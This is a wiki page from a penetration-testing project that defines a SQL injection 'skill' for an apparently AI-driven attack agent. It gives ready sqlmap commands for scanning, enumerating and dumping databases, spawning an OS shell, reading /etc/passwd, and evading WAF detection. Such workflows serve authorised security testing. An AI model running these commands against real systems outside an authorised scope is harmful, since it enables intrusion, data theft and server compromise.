Skip to content

sql injection skill

Jump to bottom
“samuele edited this page Mar 11, 2026 · 1 revision

SQL Injection Attack Skill

When to Classify Here

Use this skill when the user requests testing for SQL injection vulnerabilities, including:

  • Testing web application forms, URL parameters, or API endpoints for SQLi
  • Exploiting known SQL injection points
  • Extracting data from databases via injection
  • Blind SQL injection testing (boolean-based, time-based)

Keywords: sql injection, sqli, database extraction, union select, blind injection, sqlmap

Workflow

Phase 1: Reconnaissance (Informational)

  1. Identify injection surfaces — Use query_graph to find web applications, HTTP services, and known endpoints on the target.
  2. Discover parameters — Use kali_shell to run parameter and URL discovery: 
    katana -u http://<target> -d 2 -jc -o urls.txt
  3. Check technology stack — Identify the backend database type from service banners, error messages, or known stack info in the graph (MySQL, PostgreSQL, MSSQL, Oracle, SQLite).
  4. Map input vectors — List all GET/POST parameters, cookies, and headers that accept user input.

Once injection surfaces are identified, request transition to exploitation phase.

Phase 2: Exploitation

  1. Automated scan with sqlmap: 
    sqlmap -u "http://<target>/page?param=value" --batch --level=3 --risk=2 --random-agent
  2. Identify injection type — Determine if it's error-based, union-based, blind boolean, blind time-based, or stacked queries.
  3. Enumerate databases: 
    sqlmap -u "<url>" -p <param> --dbs --batch
  4. Enumerate tables and columns: 
    sqlmap -u "<url>" -p <param> -D <database> --tables --batch
sqlmap -u "<url>" -p <param> -D <database> -T <table> --columns --batch
  5. Extract proof data — Dump a limited sample to prove the vulnerability: 
    sqlmap -u "<url>" -p <param> -D <database> -T <table> -C <columns> --dump --start=1 --stop=5 --batch

Phase 3: Post-Exploitation

  1. Check database privileges: 
    sqlmap -u "<url>" -p <param> --privileges --batch
  2. Attempt OS shell (if DBA privileges exist): 
    sqlmap -u "<url>" -p <param> --os-shell --batch
  3. Read server files (if FILE privilege exists): 
    sqlmap -u "<url>" -p <param> --file-read="/etc/passwd" --batch

Reporting Guidelines

  • Vulnerable endpoint and parameter name
  • Injection type (error-based, union, blind, stacked)
  • Database type and version
  • Impact demonstration (databases enumerated, sample data extracted)
  • Privilege level of the database user

Important Notes

  • Always use --batch with sqlmap to avoid interactive prompts
  • Do NOT dump entire databases — extract only enough to prove the vulnerability (max 5 rows)
  • Use --random-agent to avoid WAF detection
  • If sqlmap fails, attempt manual injection before concluding "not vulnerable"
  • Respect scope — only test endpoints within the Rules of Engagement

RedAmon GitHub Repository | Report an Issue | Back to Home

Home

Getting Started

Core Workflow

Scanning & OSINT

AI & Automation

Analysis & Reporting

Reference & Help

Clone this wiki locally